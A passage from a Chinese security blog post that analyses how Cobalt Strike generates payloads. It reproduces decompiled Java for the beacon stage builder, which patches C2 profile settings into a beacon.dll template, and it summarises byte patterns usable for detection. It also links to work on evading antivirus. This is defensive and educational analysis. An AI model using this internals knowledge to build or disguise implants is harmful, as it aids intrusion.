class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br></pre></td><td class="code"><pre><span class="line">protected byte[] exportBeaconStage(int var1, String var2, boolean var3, boolean var4, String var5) &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        long var6 &#x3D; System.currentTimeMillis();</span><br><span class="line">        byte[] var8 &#x3D; SleevedResource.readResource(var5); &#x2F;&#x2F;获取sleeve&#x2F;beacon.dll的内容</span><br><span class="line">        if (var2.length() &gt; 254) &#123;</span><br><span class="line">            var2 &#x3D; var2.substring(0, 254);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        String[] var9 &#x3D; this.c2profile.getString(&quot;.http-get.uri&quot;).split(&quot; &quot;); &#x2F;&#x2F;加载配置文件中.http-get.uri的值</span><br><span class="line">        String[] var10 &#x3D; var2.split(&quot;,\\s*&quot;);</span><br><span class="line">        LinkedList var11 &#x3D; new LinkedList();</span><br><span class="line"></span><br><span class="line">        for(int var12 &#x3D; 0; var12 &lt; var10.length; ++var12) &#123;</span><br><span class="line">            var11.add(var10[var12]);</span><br><span class="line">            var11.add(CommonUtils.pick(var9));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        String var32;</span><br><span class="line">        while(var11.size() &gt; 2 &amp;&amp; CommonUtils.join(var11, &quot;,&quot;).length() &gt; 255) &#123;</span><br><span class="line">            var32 &#x3D; var11.removeLast() + &quot;&quot;;</span><br><span class="line">            String var13 &#x3D; var11.removeLast() + &quot;&quot;;</span><br><span class="line">            CommonUtils.print_info(&quot;dropping &quot; + var13 + var32 + &quot; from Beacon profile for size&quot;);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        var32 &#x3D; randua(this.c2profile);</span><br><span class="line">        int var33 &#x3D; Integer.parseInt(this.c2profile.getString(&quot;.sleeptime&quot;)); &#x2F;&#x2F;加载配置文件的sleeptime的值</span><br><span class="line">        String var14 &#x3D; CommonUtils.pick(this.c2profile.getString(&quot;.http-post.uri&quot;).split(&quot; &quot;));</span><br><span class="line">        byte[] var15 &#x3D; this.c2profile.recover_binary(&quot;.http-get.server.output&quot;);</span><br><span class="line">        byte[] var16 &#x3D; this.c2profile.apply_binary(&quot;.http-get.client&quot;);</span><br><span class="line">        byte[] var17 &#x3D; this.c2profile.apply_binary(&quot;.http-post.client&quot;);</span><br><span class="line">        int var18 &#x3D; this.c2profile.size(&quot;.http-get.server.output&quot;, 1048576);</span><br><span class="line">        int var19 &#x3D; Integer.parseInt(this.c2profile.getString(&quot;.jitter&quot;));</span><br><span class="line">        if (var19 &lt; 0 || var19 &gt; 99) &#123;</span><br><span class="line">            var19 &#x3D; 0;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        int var20 &#x3D; Integer.parseInt(this.c2profile.getString(&quot;.maxdns&quot;));</span><br><span class="line">        if (var20 &lt; 0 || var20 &gt; 255) &#123;</span><br><span class="line">            var20 &#x3D; 255;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        int var21 &#x3D; 0;</span><br><span class="line">        if (var3) &#123;</span><br><span class="line">            var21 |&#x3D; 1;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        if (var4) &#123;</span><br><span class="line">            var21 |&#x3D; 8;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        long var22 &#x3D; CommonUtils.ipToLong(this.c2profile.getString(&quot;.dns_idle&quot;));</span><br><span class="line">        int var24 &#x3D; Integer.parseInt(this.c2profile.getString(&quot;.dns_sleep&quot;));</span><br><span class="line">        Settings var25 &#x3D; new Settings();</span><br><span class="line">        var25.addShort(1, var21);</span><br><span class="line">        var25.addShort(2, var1);</span><br><span class="line">        var25.addInt(3, var33);</span><br><span class="line">        var25.addInt(4, var18);</span><br><span class="line">        var25.addShort(5, var19);</span><br><span class="line">        var25.addShort(6, var20);</span><br><span class="line">        var25.addData(7, this.publickey, 256);</span><br><span class="line">        var25.addString(8, CommonUtils.join(var11, &quot;,&quot;), 256);</span><br><span class="line">        var25.addString(9, var32, 128);</span><br><span class="line">        var25.addString(10, var14, 64);</span><br><span class="line">        var25.addData(11, var15, 256);</span><br><span class="line">        var25.addData(12, var16, 256);</span><br><span class="line">        var25.addData(13, var17, 256);</span><br><span class="line">        var25.addData(14, CommonUtils.asBinary(this.c2profile.getString(&quot;.spawnto&quot;)), 16);</span><br><span class="line">        var25.addString(29, this.c2profile.getString(&quot;.post-ex.spawnto_x86&quot;), 64);</span><br><span class="line">        var25.addString(30, this.c2profile.getString(&quot;.post-ex.spawnto_x64&quot;), 64);</span><br><span class="line">        var25.addString(15, &quot;&quot;, 128);</span><br><span class="line">        var25.addShort(31, QuickSecurity.getCryptoScheme());</span><br><span class="line">        var25.addInt(19, (int)var22);</span><br><span class="line">        var25.addInt(20, var24);</span><br><span class="line">        var25.addString(26, this.c2profile.getString(&quot;.http-get.verb&quot;), 16);</span><br><span class="line">        var25.addString(27, this.c2profile.getString(&quot;.http-post.verb&quot;), 16);</span><br><span class="line">        var25.addInt(28, this.c2profile.shouldChunkPosts() ? 96 : 0);</span><br><span class="line">        var25.addInt(37, this.c2profile.getInt(&quot;.watermark&quot;));</span><br><span class="line">        var25.addShort(38, this.c2profile.option(&quot;.stage.cleanup&quot;) ? 1 : 0);</span><br><span class="line">        var25.addShort(39, this.c2profile.exerciseCFGCaution() ? 1 : 0);</span><br><span class="line">        String var26 &#x3D; this.listener.getHostHeader();</span><br><span class="line">        if (var26 !&#x3D; null &amp;&amp; var26.length() !&#x3D; 0) &#123;</span><br><span class="line">            if (Profile.usesHostBeacon(this.c2profile)) &#123;</span><br><span class="line">                var25.addString(54, &quot;&quot;, 128); &#x2F;&#x2F;获取host的值进行赋值</span><br><span class="line">            &#125; else &#123;</span><br><span class="line">                var25.addString(54, &quot;Host: &quot; + this.listener.getHostHeader() + &quot;\r\n&quot;, 128);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            var25.addString(54, &quot;&quot;, 128);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        if (Profile.usesCookieBeacon(this.c2profile)) &#123;</span><br><span class="line">            var25.addShort(50, 1);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            var25.addShort(50, 0);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        ProxyServer var27 &#x3D; ProxyServer.parse(this.listener.getProxyString());</span><br><span class="line">        var27.setup(var25);</span><br><span class="line">        this.setupKillDate(var25);</span><br><span class="line">        this.setupGargle(var25, var5);</span><br><span class="line">        (new ProcessInject(this.c2profile)).apply(var25);</span><br><span class="line">        byte[] var28 &#x3D; var25.toPatch();</span><br><span class="line">        var28 &#x3D; beacon_obfuscate(var28);</span><br><span class="line">        String var29 &#x3D; CommonUtils.bString(var8);</span><br><span class="line">        int var30 &#x3D; var29.indexOf(&quot;AAAABBBBCCCCDDDDEEEEFFFF&quot;); &#x2F;&#x2F;找到AAAABBBBCCCCDDDDEEEEFFFF的位置</span><br><span class="line">        var29 &#x3D; CommonUtils.replaceAt(var29, CommonUtils.bString(var28), var30); &#x2F;&#x2F;将模板的内容进行替换</span><br><span class="line">        return CommonUtils.toBytes(var29); &#x2F;&#x2F;返回替换后的结果</span><br><span class="line">    &#125; catch (IOException var31) &#123;</span><br><span class="line">        MudgeSanity.logException(&quot;export Beacon stage: &quot; + var5, var31, false);</span><br><span class="line">        return new byte[0];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        简单的分析后我们发现这段代码的主要作用是读取beacon.dll文件，以这个文件作为模板对一些值进行替换，并且是以找到AAAABBBBCCCCDDDDEEEEFFFF来找到要替换的位置的，但是比较奇怪的是我再beacon.dll中并没有发现AAAABBBBCCCCDDDDEEEEFFFF这个字符串。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901154145081.png" alt="image-20200901154145081"></p>
<p>​        后面根据不同的类型的类型，调用patchArtifact方法，虽然使用的模板不同，最终还是会有4个a的特征，不过可能使用这种方式的模板比较大，因此不会有大写A这种特征。因为本身替代Stager那部分比如beacon.dll的文件内容就比较大，有200多k。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901154601816.png" alt="image-20200901154601816"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>​        总结一下这几种生成方式的过程和一些区别</p>
<ul>
<li>payload generator只是加载stager模板并且对里面host，port和uri部分进行替换，最终生成的文件只是将stager文件以字节数组的形式进行输出</li>
<li>windows executable首先生成stager，这个stager可能非常小，再去替换模板文件中出现1024个A的地址，这种方式由于stager比较小，而且在模板插入stager之前会写入4个a，因此可以把出现4个a和a出现后的1024字节内出现多个A为特征进行检测</li>
<li>windows executables这种方式不会再去生成stager而是使用其他的方式进行替换，而替换stager的部分模板文件过大，因此会在插入的开始出现4个a但是不会出现多个A。</li>
</ul>
<p><strong>参考文章</strong></p>
<p><a href="https://xz.aliyun.com/t/8103" target="_blank" rel="noopener">从剖析CS木马生成到开发免杀工具</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/cobaltstrike/" rel="tag"># cobaltstrike</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/31/%E5%85%B3%E4%BA%8E%E5%86%85%E7%BD%91%E6%89%B9%E9%87%8F%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%E7%9A%84%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" rel="prev" title="关于内网批量横向渗透的学习总结">
      <i class="fa fa-chevron-left"></i> 关于内网批量横向渗透的学习总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/09/01/%E5%85%B3%E4%BA%8Ecobaltstrike%E9%80%9A%E4%BF%A1%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90/" rel="next" title="关于cobaltstrike通信流程的分析">
      关于cobaltstrike通信流程的分析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#payload-generator"><span class="nav-number">1.</span> <span class="nav-text">payload generator</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#windows-executable"><span class="nav-number">2.</span> <span class="nav-text">windows executable</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#windows-executables"><span class="nav-number">3.</span> <span class="nav-text">windows executables</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">藏青</p>
  <div class="site-description" itemprop="description">知行合一</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">藏青</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.1
  </div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
